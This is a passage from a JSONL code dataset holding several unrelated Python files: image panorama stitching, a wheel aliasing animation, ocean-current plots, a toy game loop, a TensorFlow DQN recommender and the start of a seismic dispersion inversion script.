and\n (np.array_equal((img2[j, i]), np.array([0, 0, 0])))):\n img2[j, i] = [0, 0, 0]\n elif np.array_equal(img2[j, i], np.array([0, 0, 0])):\n img2[j, i] = img1[j, i]\n return img2\n\n\ndef generalised_mosaic(images, ref_id):\n \"\"\"\n function for generalised panormaic mosaicing from given n images\n Input: set of images and reference image id\n Output: Stitched image\n \"\"\"\n\n left = images[0:ref_id]\n right = images[ref_id:]\n # print(len(left), len(right), len(images))\n\n left_1 = left[0]\n for img in left[1:]:\n inv_h = get_homography(img, left_1)\n f_1 = np.dot(inv_h, np.array([0, 0, 1]))\n inv_h[0][-1] += abs(f_1[0])\n inv_h[1][-1] += abs(f_1[1])\n y_shift = abs(int(f_1[1]))\n x_shift = abs(int(f_1[0]))\n dest_size = (left_1.shape[1]+img.shape[1],\n left_1.shape[0]+img.shape[0])\n temp = cv2.warpPerspective(left_1, inv_h, dest_size)\n temp[y_shift:img.shape[0]+y_shift, x_shift:img.shape[1]+x_shift] = img\n left_1 = temp\n # return temp\n\n for img in right:\n homo = get_homography(left_1, img)\n dest_dim = np.dot(homo, np.array([img.shape[1],\n img.shape[0], 1]))\n dest_dim = dest_dim/dest_dim[-1]\n dest_size = (left_1.shape[1]+img.shape[1],\n left_1.shape[0]+img.shape[0])\n temp = cv2.warpPerspective(img, homo, dest_size)\n temp = assign_pxl(left_1, temp)\n left_1 = temp\n result = temp\n return result\n\n\nif __name__ == \"__main__\":\n PARSE = argparse.ArgumentParser('Generalised Mosaicing')\n PARSE.add_argument('dir', type=str, default='../data/general/mountain/')\n PARSE.add_argument('ref_idx', type=int)\n ARGS = PARSE.parse_args()\n IMAGES = []\n for _, _, file_ in os.walk(ARGS.dir):\n file_.sort()\n for f in file_:\n image_path = ARGS.dir+'{}'.format(f)\n # print(image_path)\n IMAGES.append(cv2.imread(image_path))\n # print(len(IMAGES))\n print('---Generating Panorama. Please wait !!!---')\n OUTPUT = generalised_mosaic(IMAGES, ARGS.ref_idx)\n\n # Crop the image to remove as much black border as possible\n GRAY = cv2.cvtColor(OUTPUT, cv2.COLOR_BGR2GRAY)\n _, THRESH = cv2.threshold(GRAY, 1, 255, cv2.THRESH_BINARY)\n CONTOURS, _ = cv2.findContours(THRESH, cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\n CNT = CONTOURS[0]\n X, Y, W, H = cv2.boundingRect(CNT)\n CROP = OUTPUT[Y:Y+H, X:X+W]\n # print(ARGS.dir.split('/'))\n WRITE_PATH = '../results/pano-general-results/{}'\\\n .format(ARGS.dir.split('/')[-2])+'.png'\n # print(WRITE_PATH)\n cv2.imwrite(WRITE_PATH, CROP)\n cv2.namedWindow('RESULT', cv2.WINDOW_NORMAL)\n cv2.imshow('RESULT', CROP)\n cv2.waitKey(0)\n","sub_path":"midsem/130010009_140076001_150050001_lab03_midsem/code/pano-general.py","file_name":"pano-general.py","file_ext":"py","file_size_in_byte":4316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"23772124","text":"from __future__ import division\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef draw_wheel(spokes, angle):\n '''\n Draws a wheel in a pyplot with the number of spokes determined by \"spokes\".\n '''\n # Draw outer circle\n N = 200\n t = np.linspace(0, N, num=N + 1) * 2 * np.pi / N \n wheel_width = 10\n ax.plot(np.cos(t), np.sin(t), 'k', linewidth=wheel_width)\n\n # Spokes - calculate angle and draw them individually\n spoke_angle = 2*np.pi / spokes\n spoke_width = 3\n \n for i in range(1, spokes + 1):\n x = np.concatenate((np.array([0]), np.array([np.cos(angle+(i-1)*spoke_angle)])), axis=0)\n y = np.concatenate((np.array([0]), np.array([-np.sin(angle+(i-1)*spoke_angle)])), axis=0)\n ax.plot(x, y, 'k', linewidth=spoke_width)\n fig.canvas.draw() # update the line\n \n fig.canvas.flush_events() # makes it look like it's spinning by updating the figure\n return 1\n \nif __name__ == '__main__':\n # Parameters\n seconds = 2\n frame_rate = 10\n spokes = 5\n angular_velocity = 0.5 * np.pi\n \n # Create the plot\n plt.ion()\n d_angle = angular_velocity / frame_rate\n fig = plt.figure()\n ax = fig.add_subplot(111, aspect='equal')\n \n # Go through frames\n for cur_frame in range(1, int(np.ceil(seconds * frame_rate))):\n plt.cla()\n draw_wheel(spokes, d_angle*(cur_frame - 1))\n plt.show()\n","sub_path":"Exercises/4/Solution/wheel_aliasing.py","file_name":"wheel_aliasing.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"323256517","text":"# monthly averaged stack diagram\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport argparse\nfrom datetime import datetime\nfrom datetime import timedelta\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.dates as mdates # for month ticks\n\n# for debugging\ndef print_full(x):\n pd.set_option('display.max_rows', len(x))\n print(x)\n pd.reset_option('display.max_rows')\n\nout_fn = '../../../THESIS/figures/results/'\nout_data = str(input('Data being processed? (on/off): '))\n\n#############\n# __SETUP__ #\n#############\n\nparser = argparse.ArgumentParser(description=__doc__)\n# add a positional writable file argument\nparser.add_argument('input_csv_file', type=argparse.FileType('r'))\n# parser.add_argument('output_csv_file', type=argparse.FileType('w')) \nargs = parser.parse_args()\n\n############\n# __DATA__ #\n############\n\n# Read in stack data\ndata = pd.read_csv(args.input_csv_file, parse_dates = ['xtime'], \n infer_datetime_format = True) #Read as DateTime obsject\ndata['xyear'] = [x.year for x in data['xtime']]\ndata['xday'] = [x.day for x in data['xtime']]\n#data['DoY'] = [x.timetuple().tm_yday for x in data['xtime']]\ndata = data.drop_duplicates('xtime').reset_index(drop=True)\ndata = data.sort_values('xtime').reset_index(drop=True)\n\n# group data\ndata2 = data.groupby(['xyear', 'xmonth']).mean().reset_index()\ndata2['xtime'] = [datetime(int(x[1]['xyear']), int(x[1]['xmonth']), 1, 0, 0, 0) for x in data2.iterrows()]\n\ndata3 = data2.groupby(['xyear']).mean().reset_index()\ndata3['xtime'] = [datetime(int(x[1]['xyear']), 1, 1, 0, 0, 0) for x in data3.iterrows()]\n\n# Seasonal data\ndata4 = data[data.xyear != 2016]\ndata4 = data.groupby(['xmonth', 'xday']).mean().reset_index()\ndata4_std = data.groupby(['xmonth', 'xday']).std().reset_index()\n# add seasonal first half vs second half\ndata4a = data[data.xyear != 2016]\ndata4a = data4a.set_index(['xtime'])\ndata4b = data4a\ndata4a = data4a.loc['1994-1-1':'1999-12-31']\ndata4b = data4b.loc['2010-1-1':'2015-12-31']\ndata4a = data4a.groupby(['xmonth', 'xday']).mean().reset_index()\ndata4b = data4b.groupby(['xmonth', 'xday']).mean().reset_index()\n\n# % of year above 50% EAC dominance\ndata['dom'] = [1 if x > 0.5 else 0 for x in data['yEACr']]\ndata5 = data.groupby(['xyear', 'dom']).count()\ndom1 = list(data5['yEAC'][1::2])\ndom0 = list(data5['yEAC'][::2])\ndomtot = [x + y for x, y in zip(dom1, dom0)]\ndom = [x/y for x, y in zip(dom1, domtot)]\ndom[-1] = np.nan\ndata5 = {'dom':dom, 'year':list(range(1994,2017,1))}\ndata5 = pd.DataFrame(data=data5)\n\n############\n# __PLOT__ #\n############\n\n# # __normal_plot__\n# fig, ax = plt.subplots(figsize=(20, 3))\n# ax.stackplot(list(data['xtime']), list(data['yTSWr']), list(data['yEACr']))\n# plt.title('EAC Influence (daily)')\n# plt.show()\n# plt.close(\"all\")\n\n# # __Monthly_plot__\n# fig, ax = plt.subplots(figsize=(20, 3))\n# ax.stackplot(list(data2['xtime']), list(data2['yTSWr']), list(data2['yEACr']))\n# plt.title('EAC Influence (monthly)')\n# plt.show()\n# plt.close(\"all\")\n\n# # __yearly_means_plot__\n# # v1\n# fig, ax = plt.subplots()\n# ax.stackplot(list(data3['xtime']), list(data3['yTSWr']), list(data3['yEACr']))\n# plt.title('EAC Influence (yearly)')\n# plt.show()\n# plt.close(\"all\")\n# # v2\n# p1 = plt.bar(list(data3['xyear']), list(data3['yTSWr']), 1)\n# p2 = plt.bar(list(data3['xyear']), list(data3['yEACr']), 1, bottom=list(data3['yTSWr']))\n# plt.ylabel('Relative Influence')\n# plt.xlabel('Year')\n# plt.yticks(np.arange(0, 1.1, 0.1))\n# plt.xticks(np.arange(1994, 2017, 2))\n# plt.title('EAC Influence (yearly)')\n# plt.legend((p1[0], p2[0]), ('non-EAC', 'EAC'))\n# plt.show()\n\n# # __Seasonal_Plot__\n# fig, ax = plt.subplots()\n# ax.stackplot(list(data4.index), list(data4['yTSWr']), list(data4['yEACr']))\n# plt.title('Mean Seasonal EAC Influence')\n# plt.show()\n# plt.close(\"all\")\n\n# __Monthly_plot__\nfig, ax = plt.subplots(figsize=(20, 3))\nplt.grid(ls='dashed', alpha=0.7)\nx = list(range(0,len(data2.xtime)))\nx = [i/12 + 1994 for i in x]\ndata2['x'] = x\nax.stackplot(list(data2['x']), list(data2['yEACr']), color='#808080')\nax.set(xticks=list(range(1994,2017,2)))\nax.set_xlim(1994,2017)\nplt.ylabel('EAC Fraction', labelpad=16, size=14)\nplt.show()\nfig.savefig(out_fn + 'monthly_' + out_data + '.png')\nplt.close(\"all\")\n\n\n# # __Dominance_plot__\n# # with sns.axes_style(\"darkgrid\"):\n# fig, ax = plt.subplots(figsize=(20, 2))\n# plt.grid(ls='dashed', alpha=0.7)\n# plt.plot(data5.year, data5.dom, color='#606060', alpha=1, marker='+')\n# ax = sns.regplot(x='year', y=\"dom\", data=data5, color='b', marker=\"+\", \n# \t\t\t\t\tline_kws={'alpha':0.4}, scatter_kws={'alpha':0}, ci=95)\n# plt.ylabel('EAC Dominance', labelpad=16, size=14)\n# plt.xlabel('')\n# plt.xticks(np.arange(1994, 2017, step=2))\n# ax.set_xlim(1994,2017)\n# plt.yticks(np.arange(0.2, 0.8, step=0.2))\n# ax.set_ylim(0.1,0.7)\n# plt.show()\n# fig.savefig(out_fn + 'dom_' + out_data + '.png')\n# plt.close(\"all\")\n\n# __yearly_means_plot__\nfig, ax = plt.subplots(figsize=(20, 2))\nax.set(xticks=list(range(1994,2017,2)))\nax.set_xlim(1994, 2017)\nax = sns.regplot(x='xyear', y=\"yEACr\", data=data3, color='b', line_kws={'alpha':0.4}, scatter_kws={'alpha':0}, ci=95, truncate=True)\nax.set_ylabel('EAC Fraction', labelpad=16, size=14)\nplt.grid(ls='dashed', alpha=0.7)\nplt.plot('xyear', 'yEACr', data=data3, color='#606060', marker='+', alpha=1)\nplt.yticks(np.arange(0.2, 0.8, step=0.2))\nax.set_ylim(0.1,0.9)\nplt.show()\nfig.savefig(out_fn + 'year_' + out_data + '.png')\nplt.close(\"all\")\n\n\n# make time ticks\nindex = data4.index\nbase = datetime(2000, 1, 1, 0, 0, 0)\nindex = [base + timedelta(int(x)) for x in index]\n# Set the locator\nlocator = mdates.MonthLocator() # every month\n# Specify the format - %b gives us Jan, Feb...\nfmt = mdates.DateFormatter('%b')\n\n# __Seasonal_plot__\nif out_data == 'off':\n\ttitle = 'Offshore Zone'\nif out_data == 'on':\n\ttitle = 'Coastal Zone'\nfig, ax = plt.subplots(figsize=(20, 3))\nplt.grid(ls='dashed', alpha=0.7)\nax.stackplot(index, list(data4['yEACr']), color='#606060')\nub, lb = data4['yEACr']+data4_std['yEACr'], data4['yEACr']-data4_std['yEACr'] \nub = [1 if x >= 1 else x for x in ub]\nlb = [0 if x <= 0 else x for x in lb]\nplt.fill_between(index, lb, ub, alpha=0.25, color='#4682B4')\n# plt.plot(index, ub, '--', color='k', alpha=0.1)\n# plt.plot(index, lb, '--', color='k', alpha=0.1)\nplt.plot(index, data4a.yEACr, '--', color='b', alpha=0.6)\nplt.plot(index, data4b.yEACr, '--', color='r', alpha=0.6)\nplt.ylabel('EAC Fraction', labelpad=16, size = 14)\nplt.title(title, size=15)\nX = plt.gca().xaxis\nX.set_major_locator(locator)\nX.set_major_formatter(fmt)\nax.set_xlim(datetime(2000, 1, 1),datetime(2000, 12, 31))\n# ax.spines['right'].set_visible(False)\n# ax.spines['top'].set_visible(False)\nplt.show()\nfig.savefig(out_fn + 'season_' + out_data + '.png')\nplt.close(\"all\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"temporal_plots/temporal_plots-v3.py","file_name":"temporal_plots-v3.py","file_ext":"py","file_size_in_byte":6773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"334057492","text":"\n#定义fight函数实现游戏逻辑\ndef fight():\n #定义4个变量存放数据\n my_hp = 1000\n my_power = 200\n enemy_hp = 1000\n enemy_power = 200\n\n #加入循环,让游戏可以进行多轮\n while True:\n my_hp = my_hp - enemy_power\n enemy_hp = enemy_hp - my_power\n\n print(my_hp)\n\n #判断谁的血量小于等于0\n if my_hp <=0:\n print(\"我输了\")\n #满足条件跳出循环\n break\n elif enemy_hp <=0:\n print(\"我赢了\")\n break\nfight()\n","sub_path":"python_practice/game/gene_round3.py","file_name":"gene_round3.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"397156495","text":"# -----------------------------------------------\n# -*- encoding=utf-8 -*- #\n# __author__:'焉知飞鱼' #\n# CreateTime: #\n# 2021/4/21 10:23 #\n# #\n# 天下风云出我辈, #\n# 一入江湖岁月催。 #\n# 皇图霸业谈笑中, #\n# 不胜人生一场醉。 #\n# -----------------------------------------------\nimport tensorflow as tf\nimport numpy as np\nfrom collections import deque\nfrom itertools import chain\nimport os\n\n\nclass DQN():\n def __init__(self, env, args):\n self.env = env\n self.f_dim = env.f_dim\n self.type = args.dqn_type\n self.pw_dim = args.pw_dim\n self.k = args.k\n self.model_path = args.model_path\n self.std = args.q_std\n self.hidden_dims = args.dqn_dims\n self.lr = args.dqn_lr\n self.l2_reg = args.l2_reg\n self.drop_keep_rate = args.drop_keep_rate\n self.min_value = args.min_value\n self.band_size = args.pw_band_size\n self.placeholder = {}\n\n # self.sess=tf.compat.v1.InteractiveSession()\n self.sess = self._init_session()\n self.global_step = tf.compat.v1.train.get_or_create_global_step() # trainable=False\n self._init()\n self.sess.run(tf.global_variables_initializer())\n self.saver = tf.compat.v1.train.Saver()\n self.agg_variables = tf.compat.v1.trainable_variables()\n\n def _init_session(self):\n # config = tf.ConfigProto(device_count={\"gpu\": 0})\n # config.gpu_options.allow_growth = True\n\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.5)\n config = tf.ConfigProto(gpu_options=gpu_options)\n return tf.Session(config=config)\n\n def _init(self):\n if not os.path.exists(self.model_path):\n os.makedirs(self.model_path)\n\n self.construct_placeholder()\n self.construct_Q_and_loss()\n self.construct_max_Q()\n\n def construct_placeholder(self):\n # max Q placeholder 这里定义argmax Q 和 max_Q\n self.placeholder['all_action_user_indices'] = tf.compat.v1.placeholder(dtype=tf.int64, shape=[None])\n self.placeholder['all_action_tensor_indices'] = tf.compat.v1.placeholder(dtype=tf.int64, shape=[None, 2])\n # 行当前batch的用户数,列为当前batch的用户中可选的action最大的数目。\n self.placeholder['all_action_tensor_shape'] = tf.compat.v1.placeholder(dtype=tf.int64, shape=[2])\n\n # action_cnt = np.cumsum(action_cnt)\n # action_cnt = [0] + list(action_cnt[:-1])\n # 当前用户之前的用户所有的可选的action的数量\n self.placeholder['action_count'] = tf.compat.v1.placeholder(dtype=tf.int64, shape=[None])\n # action_space_cnt[uu] = len(action_space)\n self.placeholder['action_space_count'] = tf.compat.v1.placeholder(dtype=tf.int64, shape=[None])\n\n # online版本:建议直接把all_action_feature_gather作为placeholder,输入所有可以选的items的features\n self.placeholder['all_action_id'] = tf.compat.v1.placeholder(dtype=tf.int64, shape=[None])\n\n # ----------------------------Q and loss placeholder\n # 这里定义Q function还有对应的loss。定义的时候,假设同时处理一个batch的数据,所以稍微复杂一点。\n # 输出_k个Q function,_k个loss,_k个train op\n self.placeholder['current_action_space'] = tf.compat.v1.placeholder(dtype=tf.float32, shape=[None, self.f_dim])\n self.placeholder['action_space_mean'] = tf.compat.v1.placeholder(dtype=tf.float32, shape=[None, self.f_dim])\n self.placeholder['action_space_std'] = tf.compat.v1.placeholder(dtype=tf.float32, shape=[None, self.f_dim])\n self.placeholder['y_label'] = tf.compat.v1.placeholder(dtype=tf.float32, shape=[None])\n\n def mlp(self, x, hidden_dims, output_dim, activation, sd, act_last=False, keep_prob=1.0):\n hidden_dims = tuple(map(int, hidden_dims.split('-')))\n for h in hidden_dims:\n x = tf.layers.dense(x, h, activation=activation, trainable=True,\n kernel_initializer=tf.variance_scaling_initializer(scale=1.0, mode='fan_in',\n distribution='truncated_normal'))\n x = tf.nn.dropout(x, rate=1 - keep_prob)\n\n if act_last:\n return tf.layers.dense(x, output_dim, activation=activation, trainable=True,\n kernel_initializer=tf.variance_scaling_initializer(scale=1.0, mode='fan_in',\n distribution='truncated_normal'))\n else:\n return tf.layers.dense(x, output_dim, trainable=True,\n kernel_initializer=tf.truncated_normal_initializer(stddev=sd))\n\n # 这里定义Q function还有对应的loss。定义的时候,假设同时处理一个batch的数据,所以稍微复杂一点。\n # 输出_k个Q function,_k个loss,_k个train op,相当于是DQN的前向网络\n def construct_Q_and_loss(self):\n # (1) action states - offline的实验受到数据的限制,所以加了一个mean和std。\n # 做online实验没有数据的限制,我觉得这部分的input可以直接不要\n if self.type == 'offline':\n self.action_state = tf.concat([self.placeholder['action_space_mean'], self.placeholder['action_space_std']],\n axis=1)\n\n # (2) action id - 推荐的items的id。online的版本可以直接输入feature vector而不是id。\n # 换言之,可以忽略action_k_id,直接把(3)的action_k_feature_gather定义成placeholder,输入item features。\n # action_k_id = [[] for _ in range(self.k)]\n action_k_id = ['action_k_{}'.format(i) for i in np.arange(self.k)]\n for ii in range(self.k):\n self.placeholder[action_k_id[ii]] = tf.compat.v1.placeholder(dtype=tf.int64, shape=[None])\n action_k_feature_gather = [[] for _ in range(self.k)]\n for ii in range(self.k):\n # action_k_feature_gather[ii] 代表推荐的第ii个item的feature。(总共推荐_k个item)\n action_k_feature_gather[ii] = tf.gather(self.placeholder['current_action_space'],\n self.placeholder[action_k_id[ii]])\n\n # 定义Q: input:(user_states, action_states, action_feature)\n concate_input_k = [[] for _ in range(self.k)]\n action_feature_list = []\n q_value_k = [[] for _ in range(self.k)]\n self.loss_k = [[] for _ in range(self.k)]\n opt_k = [[] for _ in range(self.k)]\n train_variable_k = [[] for _ in range(self.k)]\n self.train_op_k = [[] for _ in range(self.k)]\n\n for ii in range(self.k):\n # 把(user_states, action_states, action_feature)三种vectors concat在一起,作为input。(online版本可以忽略action_states)\n # 注意:action_feature_list 是一步步变大的,从length=1到self.k\n action_feature_list.append(action_k_feature_gather[ii])\n action_feature_list_ = tf.concat(action_feature_list, axis=1)\n concate_input_k[ii] = tf.concat([self.env.user_states, self.action_state, action_feature_list_], axis=1)\n concate_input_k[ii] = tf.reshape(concate_input_k[ii], [-1,\n self.pw_dim * self.f_dim + 2 * self.f_dim + int(\n ii + 1) * self.f_dim])\n\n current_variables = tf.compat.v1.trainable_variables()\n # q_value_k[ii]: 构造paper里面提到的Q^j, where j=1,...,_k\n with tf.variable_scope('Q' + str(ii) + '-function', reuse=False):\n q_value_k[ii] = self.mlp(concate_input_k[ii], self.hidden_dims, 1, tf.nn.elu, sd=self.std,\n act_last=False, keep_prob=self.drop_keep_rate)\n\n q_value_k[ii] = tf.reshape(q_value_k[ii], [-1])\n\n # loss\n # y_label为reward\n ##y_label就是env算出来的reward,每个用户的reward,segment_sum操作了\n self.loss_k[ii] = tf.reduce_mean(tf.squared_difference(q_value_k[ii], self.placeholder['y_label'])) #\n # opt_k[ii] = tf.compat.v1.train.AdamOptimizer(learning_rate=self.lr)\n opt_k[ii] = tf.compat.v1.train.GradientDescentOptimizer(learning_rate=self.lr)\n\n train_variable_k[ii] = list(set(tf.compat.v1.trainable_variables()) - set(current_variables))\n l2_loss_k = tf.add_n(\n [tf.nn.l2_loss(v) for v in train_variable_k[ii] if 'bias' not in v.name]) * self.l2_reg\n\n self.train_op_k[ii] = opt_k[ii].minimize(self.loss_k[ii] + l2_loss_k, var_list=train_variable_k[ii],\n global_step=self.global_step)\n\n # self.sess.run(tf.variables_initializer(list(set(tf.global_variables())-set(agg_variables))))\n\n self.q_feed_dict = {self.placeholder['current_action_space']: [], self.placeholder['action_space_mean']: [],\n self.placeholder['action_space_std']: [], self.env.placeholder['Xs_clicked']: [],\n self.env.placeholder['history_order_indices']: [],\n self.env.placeholder['history_user_indices']: [],\n self.placeholder['y_label']: []}\n\n # return q_feed_dict,loss_k,train_op_k\n\n else: # online\n action_k_feature_gather = ['action_k_feature_gather:{}'.format(i) for i in np.arange(self.k)]\n for ii in range(self.k):\n self.placeholder[action_k_feature_gather[ii]] = tf.compat.v1.placeholder(dtype=tf.int64, shape=[None])\n\n # 定义Q: input:(user_states, action_states, action_feature)\n concate_input_k = [[] for _ in range(self.k)]\n action_feature_list = []\n q_value_k = [[] for _ in range(self.k)]\n self.loss_k = [[] for _ in range(self.k)]\n opt_k = [[] for _ in range(self.k)]\n train_variable_k = [[] for _ in range(self.k)]\n self.train_op_k = [[] for _ in range(self.k)]\n\n for ii in range(self.k):\n # 把(user_states, action_states, action_feature)三种vectors concat在一起,作为input。(online版本可以忽略action_states)\n # 注意:action_feature_list 是一步步变大的,从length=1到self.k\n action_feature_list.append(self.placeholder[action_k_feature_gather[ii]])\n action_feature_list_ = tf.concat(action_feature_list, axis=1)\n concate_input_k[ii] = tf.concat([self.env.user_states, self.action_state, action_feature_list_], axis=1)\n concate_input_k[ii] = tf.concat([self.env.user_states, action_feature_list], axis=1)\n concate_input_k[ii] = tf.reshape(concate_input_k[ii],\n [-1, self.pw_dim * self.f_dim + int(ii + 1) * self.f_dim])\n\n current_variables = tf.trainable_variables()\n # q_value_k[ii]: 构造paper里面提到的Q^j, where j=1,...,_k\n with tf.variable_scope('Q' + str(ii) + '-function', reuse=False):\n q_value_k[ii] = self.mlp(concate_input_k[ii], self.hidden_dims, 1, tf.nn.elu, sd=self.std,\n act_last=False, keep_prob=self.drop_keep_rate)\n\n q_value_k[ii] = tf.reshape(q_value_k[ii], [-1])\n\n # loss\n # y_label为reward\n ##y_label就是env算出来的reward,每个用户的reward,segment_sum操作了\n self.loss_k[ii] = tf.reduce_mean(tf.squared_difference(q_value_k[ii], self.placeholder['y_label']))\n opt_k[ii] = tf.train.AdamOptimizer(learning_rate=self.lr)\n\n train_variable_k[ii] = list(set(tf.trainable_variables()) - set(current_variables))\n l2_loss_k = tf.add_n(\n [tf.nn.l2_loss(v) for v in train_variable_k[ii] if 'bias' not in v.name]) * self.l2_reg\n\n self.train_op_k[ii] = opt_k[ii].minimize(self.loss_k[ii] + l2_loss_k, var_list=train_variable_k[ii],\n global_step=self.global_step)\n\n # self.sess.run(tf.variables_initializer(list(set(tf.global_variables())-set(agg_variables))))\n\n q_feed_dict = {self.placeholder['current_action_space']: [], self.placeholder['action_space_mean']: [],\n self.placeholder['action_space_std']: [], self.env.placeholder['Xs_clicked']: [],\n self.env.placeholder['history_order_indices']: [],\n self.env.placeholder['history_user_indices']: [],\n self.placeholder['y_label']: []}\n\n for ii in range(self.k):\n self.placeholder[action_k_feature_gather[ii]] = []\n\n # return q_feed_dict,loss_k,train_op_k\n\n # 这里定义argmax Q 和 max_Q 其实就是prediction\n def construct_max_Q(self):\n if self.type == 'offline':\n # online版本:建议直接把all_action_feature_gather作为placeholder,输入所有可以选的items的features\n # current_action_space:action_space += feature_space[user]\n all_action_feature_gather = tf.gather(self.placeholder['current_action_space'],\n self.placeholder['all_action_id'])\n user_states_scatter = tf.gather(self.env.user_states, self.placeholder['all_action_user_indices'])\n # online版本:建议:action states可以不需要\n action_states_scatter = tf.gather(self.action_state, self.placeholder['all_action_user_indices'])\n\n max_action_feature_list = []\n max_action_k = [[] for _ in range(self.k)]\n max_action_feature_k = [[] for _ in range(self.k)]\n to_avoid_repeat_tensor = tf.zeros(tf.cast(self.placeholder['all_action_tensor_shape'], tf.int32))\n\n max_q_value = []\n for ii in range(self.k):\n # 构造Q_j的input(notation: j就是ii)\n # 注意:max_action_feature_list是逐步变大,从length=0到length=_k - 1\n if ii == 0:\n concate_input = tf.concat([user_states_scatter, action_states_scatter, all_action_feature_gather],\n axis=1)\n else:\n max_action_feature_list_ = tf.concat(max_action_feature_list, axis=1)\n concate_input = tf.concat([user_states_scatter, action_states_scatter, max_action_feature_list_,\n all_action_feature_gather], axis=1)\n concate_input = tf.reshape(concate_input,\n [-1, self.pw_dim * self.f_dim + 2 * self.f_dim + self.f_dim * int(ii + 1)])\n # 把所有action(所有item)对应的Q_j values算出来\n # 注意:Q_j 要reuse 在construct_Q_and_loss中定义的Q_j\n with tf.variable_scope('Q' + str(ii) + '-function', reuse=True):\n q_value_all = self.mlp(concate_input, self.hidden_dims, 1, tf.nn.elu, sd=self.std, act_last=False,\n keep_prob=self.drop_keep_rate)\n\n q_value_all = tf.reshape(q_value_all, [-1])\n # tf.sparse_to_dense deprecated. 使用tf.sparse.SparseTensor创建一个sparsetensor,然后用tf.sparse.to_dense\n q1_tensor = tf.sparse_to_dense(self.placeholder['all_action_tensor_indices'],\n self.placeholder['all_action_tensor_shape'], q_value_all,\n default_value=self.min_value)\n q1_tensor += to_avoid_repeat_tensor\n\n # max_action_k[ii]:得到Q_j值最优的item,作为推荐的第j个item\n max_action_k[ii] = tf.argmax(q1_tensor, axis=1)\n # to_avoid_repeat_tensor是为了避免重复推荐一样的item。因为我们希望得到_k个不同的items。\n to_avoid_repeat_tensor += tf.one_hot(max_action_k[ii],\n tf.cast(self.placeholder['all_action_tensor_shape'][1], tf.int32),\n on_value=self.min_value, off_value=0.0)\n # 下面几行是把max_action_k[ii]变成真实的item id。这部分应该根据自己的实验数据格式来决定如何写。\n # 截止到当前用户,之前用户所有的可选的action的总和。不包括当前用户的cnt\n # action_count\n max_action_k[ii] = tf.add(max_action_k[ii], self.placeholder['action_count'])\n # action_id += action_id_u 为下面的all_action_id\n max_action_k[ii] = tf.gather(self.placeholder['all_action_id'], max_action_k[ii])\n max_action_feature_k[ii] = tf.gather(self.placeholder['current_action_space'], max_action_k[ii])\n max_action_k[ii] = max_action_k[ii] - self.placeholder['action_space_count']\n\n # 把argmax Q_j得到的最优item的特征存起来,作为下一个Q_{j+1}的input\n max_action_feature_k_scatter = tf.gather(max_action_feature_k[ii],\n self.placeholder['all_action_user_indices'])\n max_action_feature_list.append(max_action_feature_k_scatter)\n\n max_q_val_k = tf.math.segment_max(q_value_all, self.placeholder['all_action_user_indices'])\n max_q_value.append(max_q_val_k)\n\n # self.max_q_value = tf.math.reduce_max(max_q_value,axis=0)\n self.max_q_value = tf.math.segment_max(q_value_all, self.placeholder['all_action_user_indices'])\n\n self.max_action = tf.stack(max_action_k, axis=1)\n max_action_disp_features = tf.concat(max_action_feature_k, axis=1)\n self.max_action_disp_features = tf.reshape(max_action_disp_features, [-1, self.f_dim])\n\n max_q_feed_dict = {self.placeholder['all_action_id']: [], self.placeholder['all_action_user_indices']: [],\n self.placeholder['all_action_tensor_indices']: [],\n self.placeholder['all_action_tensor_shape']: [],\n self.placeholder['current_action_space']: [], self.env.placeholder['Xs_clicked']: [],\n self.env.placeholder['history_order_indices']: [],\n self.env.placeholder['history_user_indices']: [],\n self.placeholder['action_count']: [], self.placeholder['action_space_count']: [],\n self.placeholder['action_space_mean']: [], self.placeholder['action_space_std']: []}\n\n # return max_q_value,max_action,max_action_disp_features,max_q_feed_dict\n\n def train_on_batch(self, q_feed_dict):\n _, loss_k, step = self.sess.run([self.train_op_k, self.loss_k, self.global_step], feed_dict=q_feed_dict)\n return loss_k, step\n\n def save(self, model_name):\n save_path = os.path.join(self.model_path, model_name)\n self.saver.save(self.sess, save_path)\n print('model:{} saved success!!!!'.format(save_path))\n\n def restore(self, model_name):\n best_save_path = os.path.join(self.model_path, model_name)\n self.saver.restore(self.sess, best_save_path)\n print('model:{} loaded success!!!!'.format(best_save_path))\n\n def choose_action(self, max_q_feed_dict):\n max_action, max_action_disp_feature = self.sess.run([self.max_action, self.max_action_disp_features],\n feed_dict=max_q_feed_dict)\n return max_action, max_action_disp_feature\n\n def get_max_q_value(self, max_q_feed_dict):\n max_q_value = self.sess.run(self.max_q_value, feed_dict=max_q_feed_dict)\n return max_q_value\n","sub_path":"GAN_RL/yjp/code/dqn.py","file_name":"dqn.py","file_ext":"py","file_size_in_byte":20767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"344665916","text":"#encoding: utf-8\n#!/bin/python2.7\n\nimport numpy as np\n\nimport forward1D as dsp\nimport inversion as inv\nimport matplotlib.pyplot as plt\n\n# >> TRUE MODEL \nzt = np.array([5., 5., 5.])\nvs = np.array([300., 500., 750., 1000.])\nnu = np.array([0.33, 0.33, 0.33, 0.33])\nro = np.array([1200., 1200., 1200., 1200.])\n\n# >> FREQUENCY PARAMETERS\nwmin = 10.\nwmax = 90.\nnw = int(wmax-wmin)+1\n\n# >> GPDC\ncurve = dsp.fgpdc(zt, vs, nu, ro, wmin, wmax, nw)\n\n# >> PRIOR MODEL PHYSICAL PARAMETERS\nvs0 = np.array([450., 650., 950., 1250.])\nnu0 = np.array([0.33, 0.33, 0.33, 0.33])\nro0 = np.array([1200.,1200., 1200., 1200.])\nzl0 = np.array([4., 8., 3.])\n\n# >> UNCERTAINTIES\nudisp = np.zeros((nw), dtype=np.float32)\nudv = np.zeros((vs0.shape), dtype=np.float32)\nudz = np.zeros((zl0.shape), dtype=np.float32)\nudisp[:] = 50 #10. 